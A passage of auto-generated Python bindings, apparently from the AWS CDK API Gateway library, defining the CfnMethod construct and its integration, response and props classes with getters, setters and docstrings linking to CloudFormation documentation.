:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-timeoutinmillis
"""
return self._values.get('timeout_in_millis')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnIntegrationV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnMethod(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnMethod"):
"""A CloudFormation ``AWS::ApiGateway::Method``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Method
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, http_method: str, resource_id: str, rest_api_id: str, api_key_required: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, authorization_scopes: typing.Optional[typing.List[str]]=None, authorization_type: typing.Optional[str]=None, authorizer_id: typing.Optional[str]=None, integration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["IntegrationProperty"]]]=None, method_responses: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodResponseProperty"]]]]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, request_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]=None, request_validator_id: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::Method``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param http_method: ``AWS::ApiGateway::Method.HttpMethod``.
:param resource_id: ``AWS::ApiGateway::Method.ResourceId``.
:param rest_api_id: ``AWS::ApiGateway::Method.RestApiId``.
:param api_key_required: ``AWS::ApiGateway::Method.ApiKeyRequired``.
:param authorization_scopes: ``AWS::ApiGateway::Method.AuthorizationScopes``.
:param authorization_type: ``AWS::ApiGateway::Method.AuthorizationType``.
:param authorizer_id: ``AWS::ApiGateway::Method.AuthorizerId``.
:param integration: ``AWS::ApiGateway::Method.Integration``.
:param method_responses: ``AWS::ApiGateway::Method.MethodResponses``.
:param operation_name: ``AWS::ApiGateway::Method.OperationName``.
:param request_models: ``AWS::ApiGateway::Method.RequestModels``.
:param request_parameters: ``AWS::ApiGateway::Method.RequestParameters``.
:param request_validator_id: ``AWS::ApiGateway::Method.RequestValidatorId``.
"""
props = CfnMethodProps(http_method=http_method, resource_id=resource_id, rest_api_id=rest_api_id, api_key_required=api_key_required, authorization_scopes=authorization_scopes, authorization_type=authorization_type, authorizer_id=authorizer_id, integration=integration, method_responses=method_responses, operation_name=operation_name, request_models=request_models, request_parameters=request_parameters, request_validator_id=request_validator_id)
jsii.create(CfnMethod, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="httpMethod")
def http_method(self) -> str:
"""``AWS::ApiGateway::Method.HttpMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-httpmethod
"""
return jsii.get(self, "httpMethod")
@http_method.setter
def http_method(self, value: str):
return jsii.set(self, "httpMethod", value)
@property
@jsii.member(jsii_name="resourceId")
def resource_id(self) -> str:
"""``AWS::ApiGateway::Method.ResourceId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-resourceid
"""
return jsii.get(self, "resourceId")
@resource_id.setter
def resource_id(self, value: str):
return jsii.set(self, "resourceId", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Method.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="apiKeyRequired")
def api_key_required(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Method.ApiKeyRequired``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-apikeyrequired
"""
return jsii.get(self, "apiKeyRequired")
@api_key_required.setter
def api_key_required(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "apiKeyRequired", value)
@property
@jsii.member(jsii_name="authorizationScopes")
def authorization_scopes(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::Method.AuthorizationScopes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizationscopes
"""
return jsii.get(self, "authorizationScopes")
@authorization_scopes.setter
def authorization_scopes(self, value: typing.Optional[typing.List[str]]):
return jsii.set(self, "authorizationScopes", value)
@property
@jsii.member(jsii_name="authorizationType")
def authorization_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.AuthorizationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizationtype
"""
return jsii.get(self, "authorizationType")
@authorization_type.setter
def authorization_type(self, value: typing.Optional[str]):
return jsii.set(self, "authorizationType", value)
@property
@jsii.member(jsii_name="authorizerId")
def authorizer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.AuthorizerId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizerid
"""
return jsii.get(self, "authorizerId")
@authorizer_id.setter
def authorizer_id(self, value: typing.Optional[str]):
return jsii.set(self, "authorizerId", value)
@property
@jsii.member(jsii_name="integration")
def integration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["IntegrationProperty"]]]:
"""``AWS::ApiGateway::Method.Integration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-integration
"""
return jsii.get(self, "integration")
@integration.setter
def integration(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["IntegrationProperty"]]]):
return jsii.set(self, "integration", value)
@property
@jsii.member(jsii_name="methodResponses")
def method_responses(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodResponseProperty"]]]]]:
"""``AWS::ApiGateway::Method.MethodResponses``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-methodresponses
"""
return jsii.get(self, "methodResponses")
@method_responses.setter
def method_responses(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodResponseProperty"]]]]]):
return jsii.set(self, "methodResponses", value)
@property
@jsii.member(jsii_name="operationName")
def operation_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.OperationName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-operationname
"""
return jsii.get(self, "operationName")
@operation_name.setter
def operation_name(self, value: typing.Optional[str]):
return jsii.set(self, "operationName", value)
@property
@jsii.member(jsii_name="requestModels")
def request_models(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::Method.RequestModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestmodels
"""
return jsii.get(self, "requestModels")
@request_models.setter
def request_models(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]):
return jsii.set(self, "requestModels", value)
@property
@jsii.member(jsii_name="requestParameters")
def request_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]:
"""``AWS::ApiGateway::Method.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestparameters
"""
return jsii.get(self, "requestParameters")
@request_parameters.setter
def request_parameters(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]):
return jsii.set(self, "requestParameters", value)
@property
@jsii.member(jsii_name="requestValidatorId")
def request_validator_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.RequestValidatorId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestvalidatorid
"""
return jsii.get(self, "requestValidatorId")
@request_validator_id.setter
def request_validator_id(self, value: typing.Optional[str]):
return jsii.set(self, "requestValidatorId", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnMethod.IntegrationProperty", jsii_struct_bases=[], name_mapping={'cache_key_parameters': 'cacheKeyParameters', 'cache_namespace': 'cacheNamespace', 'connection_id': 'connectionId', 'connection_type': 'connectionType', 'content_handling': 'contentHandling', 'credentials': 'credentials', 'integration_http_method': 'integrationHttpMethod', 'integration_responses': 'integrationResponses', 'passthrough_behavior': 'passthroughBehavior', 'request_parameters': 'requestParameters', 'request_templates': 'requestTemplates', 'timeout_in_millis': 'timeoutInMillis', 'type': 'type', 'uri': 'uri'})
class IntegrationProperty():
def __init__(self, *, cache_key_parameters: typing.Optional[typing.List[str]]=None, cache_namespace: typing.Optional[str]=None, connection_id: typing.Optional[str]=None, connection_type: typing.Optional[str]=None, content_handling: typing.Optional[str]=None, credentials: typing.Optional[str]=None, integration_http_method: typing.Optional[str]=None, integration_responses: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnMethod.IntegrationResponseProperty"]]]]]=None, passthrough_behavior: typing.Optional[str]=None, request_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, request_templates: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, timeout_in_millis: typing.Optional[jsii.Number]=None, type: typing.Optional[str]=None, uri: typing.Optional[str]=None):
"""
:param cache_key_parameters: ``CfnMethod.IntegrationProperty.CacheKeyParameters``.
:param cache_namespace: ``CfnMethod.IntegrationProperty.CacheNamespace``.
:param connection_id: ``CfnMethod.IntegrationProperty.ConnectionId``.
:param connection_type: ``CfnMethod.IntegrationProperty.ConnectionType``.
:param content_handling: ``CfnMethod.IntegrationProperty.ContentHandling``.
:param credentials: ``CfnMethod.IntegrationProperty.Credentials``.
:param integration_http_method: ``CfnMethod.IntegrationProperty.IntegrationHttpMethod``.
:param integration_responses: ``CfnMethod.IntegrationProperty.IntegrationResponses``.
:param passthrough_behavior: ``CfnMethod.IntegrationProperty.PassthroughBehavior``.
:param request_parameters: ``CfnMethod.IntegrationProperty.RequestParameters``.
:param request_templates: ``CfnMethod.IntegrationProperty.RequestTemplates``.
:param timeout_in_millis: ``CfnMethod.IntegrationProperty.TimeoutInMillis``.
:param type: ``CfnMethod.IntegrationProperty.Type``.
:param uri: ``CfnMethod.IntegrationProperty.Uri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html
"""
self._values = {
}
if cache_key_parameters is not None: self._values["cache_key_parameters"] = cache_key_parameters
if cache_namespace is not None: self._values["cache_namespace"] = cache_namespace
if connection_id is not None: self._values["connection_id"] = connection_id
if connection_type is not None: self._values["connection_type"] = connection_type
if content_handling is not None: self._values["content_handling"] = content_handling
if credentials is not None: self._values["credentials"] = credentials
if integration_http_method is not None: self._values["integration_http_method"] = integration_http_method
if integration_responses is not None: self._values["integration_responses"] = integration_responses
if passthrough_behavior is not None: self._values["passthrough_behavior"] = passthrough_behavior
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_templates is not None: self._values["request_templates"] = request_templates
if timeout_in_millis is not None: self._values["timeout_in_millis"] = timeout_in_millis
if type is not None: self._values["type"] = type
if uri is not None: self._values["uri"] = uri
@property
def cache_key_parameters(self) -> typing.Optional[typing.List[str]]:
"""``CfnMethod.IntegrationProperty.CacheKeyParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-cachekeyparameters
"""
return self._values.get('cache_key_parameters')
@property
def cache_namespace(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.CacheNamespace``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-cachenamespace
"""
return self._values.get('cache_namespace')
@property
def connection_id(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.ConnectionId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-connectionid
"""
return self._values.get('connection_id')
@property
def connection_type(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.ConnectionType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-connectiontype
"""
return self._values.get('connection_type')
@property
def content_handling(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.ContentHandling``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-contenthandling
"""
return self._values.get('content_handling')
@property
def credentials(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.Credentials``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-credentials
"""
return self._values.get('credentials')
@property
def integration_http_method(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.IntegrationHttpMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-integrationhttpmethod
"""
return self._values.get('integration_http_method')
@property
def integration_responses(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnMethod.IntegrationResponseProperty"]]]]]:
"""``CfnMethod.IntegrationProperty.IntegrationResponses``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-integrationresponses
"""
return self._values.get('integration_responses')
@property
def passthrough_behavior(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.PassthroughBehavior``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-passthroughbehavior
"""
return self._values.get('passthrough_behavior')
@property
def request_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnMethod.IntegrationProperty.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-requestparameters
"""
return self._values.get('request_parameters')
@property
def request_templates(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnMethod.IntegrationProperty.RequestTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-requesttemplates
"""
return self._values.get('request_templates')
@property
def timeout_in_millis(self) -> typing.Optional[jsii.Number]:
"""``CfnMethod.IntegrationProperty.TimeoutInMillis``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-timeoutinmillis
"""
return self._values.get('timeout_in_millis')
@property
def type(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.Type``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-type
"""
return self._values.get('type')
@property
def uri(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.Uri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-uri
"""
return self._values.get('uri')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'IntegrationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnMethod.IntegrationResponseProperty", jsii_struct_bases=[], name_mapping={'status_code': 'statusCode', 'content_handling': 'contentHandling', 'response_parameters': 'responseParameters', 'response_templates': 'responseTemplates', 'selection_pattern': 'selectionPattern'})
class IntegrationResponseProperty():
def __init__(self, *, status_code: str, content_handling: typing.Optional[str]=None, response_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, response_templates: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, selection_pattern: typing.Optional[str]=None):
"""
:param status_code: ``CfnMethod.IntegrationResponseProperty.StatusCode``.
:param content_handling: ``CfnMethod.IntegrationResponseProperty.ContentHandling``.
:param response_parameters: ``CfnMethod.IntegrationResponseProperty.ResponseParameters``.
:param response_templates: ``CfnMethod.IntegrationResponseProperty.ResponseTemplates``.
:param selection_pattern: ``CfnMethod.IntegrationResponseProperty.SelectionPattern``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html
"""
self._values = {
'status_code': status_code,
}
if content_handling is not None: self._values["content_handling"] = content_handling
if response_parameters is not None: self._values["response_parameters"] = response_parameters
if response_templates is not None: self._values["response_templates"] = response_templates
if selection_pattern is not None: self._values["selection_pattern"] = selection_pattern
@property
def status_code(self) -> str:
"""``CfnMethod.IntegrationResponseProperty.StatusCode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html#cfn-apigateway-method-integration-integrationresponse-statuscode
"""
return self._values.get('status_code')
@property
def content_handling(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationResponseProperty.ContentHandling``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html#cfn-apigateway-method-integrationresponse-contenthandling
"""
return self._values.get('content_handling')
@property
def response_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnMethod.IntegrationResponseProperty.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html#cfn-apigateway-method-integration-integrationresponse-responseparameters
"""
return self._values.get('response_parameters')
@property
def response_templates(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnMethod.IntegrationResponseProperty.ResponseTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html#cfn-apigateway-method-integration-integrationresponse-responsetemplates
"""
return self._values.get('response_templates')
@property
def selection_pattern(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationResponseProperty.SelectionPattern``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html#cfn-apigateway-method-integration-integrationresponse-selectionpattern
"""
return self._values.get('selection_pattern')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'IntegrationResponseProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnMethod.MethodResponseProperty", jsii_struct_bases=[], name_mapping={'status_code': 'statusCode', 'response_models': 'responseModels', 'response_parameters': 'responseParameters'})
class MethodResponseProperty():
def __init__(self, *, status_code: str, response_models: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, response_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]=None):
"""
:param status_code: ``CfnMethod.MethodResponseProperty.StatusCode``.
:param response_models: ``CfnMethod.MethodResponseProperty.ResponseModels``.
:param response_parameters: ``CfnMethod.MethodResponseProperty.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-methodresponse.html
"""
self._values = {
'status_code': status_code,
}
if response_models is not None: self._values["response_models"] = response_models
if response_parameters is not None: self._values["response_parameters"] = response_parameters
@property
def status_code(self) -> str:
"""``CfnMethod.MethodResponseProperty.StatusCode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-methodresponse.html#cfn-apigateway-method-methodresponse-statuscode
"""
return self._values.get('status_code')
@property
def response_models(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnMethod.MethodResponseProperty.ResponseModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-methodresponse.html#cfn-apigateway-method-methodresponse-responsemodels
"""
return self._values.get('response_models')
@property
def response_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]:
"""``CfnMethod.MethodResponseProperty.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-methodresponse.html#cfn-apigateway-method-methodresponse-responseparameters
"""
return self._values.get('response_parameters')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodResponseProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnMethodProps", jsii_struct_bases=[], name_mapping={'http_method': 'httpMethod', 'resource_id': 'resourceId', 'rest_api_id': 'restApiId', 'api_key_required': 'apiKeyRequired', 'authorization_scopes': 'authorizationScopes', 'authorization_type': 'authorizationType', 'authorizer_id': 'authorizerId', 'integration': 'integration', 'method_responses': 'methodResponses', 'operation_name': 'operationName', 'request_models': 'requestModels', 'request_parameters': 'requestParameters', 'request_validator_id': 'requestValidatorId'})
class CfnMethodProps():
def __init__(self, *, http_method: str, resource_id: str, rest_api_id: str, api_key_required: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, authorization_scopes: typing.Optional[typing.List[str]]=None, authorization_type: typing.Optional[str]=None, authorizer_id: typing.Optional[str]=None, integration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnMethod.IntegrationProperty"]]]=None, method_responses: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnMethod.MethodResponseProperty"]]]]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, request_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]=None, request_validator_id: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::Method``.
:param http_method: ``AWS::ApiGateway::Method.HttpMethod``.
:param resource_id: ``AWS::ApiGateway::Method.ResourceId``.
:param rest_api_id: ``AWS::ApiGateway::Method.RestApiId``.
:param api_key_required: ``AWS::ApiGateway::Method.ApiKeyRequired``.
:param authorization_scopes: ``AWS::ApiGateway::Method.AuthorizationScopes``.
:param authorization_type: ``AWS::ApiGateway::Method.AuthorizationType``.
:param authorizer_id: ``AWS::ApiGateway::Method.AuthorizerId``.
:param integration: ``AWS::ApiGateway::Method.Integration``.
:param method_responses: ``AWS::ApiGateway::Method.MethodResponses``.
:param operation_name: ``AWS::ApiGateway::Method.OperationName``.
:param request_models: ``AWS::ApiGateway::Method.RequestModels``.
:param request_parameters: ``AWS::ApiGateway::Method.RequestParameters``.
:param request_validator_id: ``AWS::ApiGateway::Method.RequestValidatorId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html
"""
self._values = {
'http_method': http_method,
'resource_id': resource_id,
'rest_api_id': rest_api_id,
}
if api_key_required is not None: self._values["api_key_required"] = api_key_required
if authorization_scopes is not None: self._values["authorization_scopes"] = authorization_scopes
if authorization_type is not None: self._values["authorization_type"] = authorization_type
if authorizer_id is not None: self._values["authorizer_id"] = authorizer_id
if integration is not None: self._values["integration"] = integration
if method_responses is not None: self._values["method_responses"] = method_responses
if operation_name is not None: self._values["operation_name"] = operation_name
if request_models is not None: self._values["request_models"] = request_models
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_validator_id is not None: self._values["request_validator_id"] = request_validator_id
@property
def http_method(self) -> str:
"""``AWS::ApiGateway::Method.HttpMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-httpmethod
"""
return self._values.get('http_method')
@property
def resource_id(self) -> str:
"""``AWS::ApiGateway::Method.ResourceId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-resourceid
"""
return self._values.get('resource_id')
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Method.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-restapiid
"""
return self._values.get('rest_api_id')
@property
def api_key_required(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Method.ApiKeyRequired``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-apikeyrequired
"""
return self._values.get('api_key_required')
@property
def authorization_scopes(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::Method.AuthorizationScopes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizationscopes
"""
return self._values.get('authorization_scopes')
@property
def authorization_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.AuthorizationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizationtype
"""
return self._values.get('authorization_type')
@property
def authorizer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.AuthorizerId``.
see
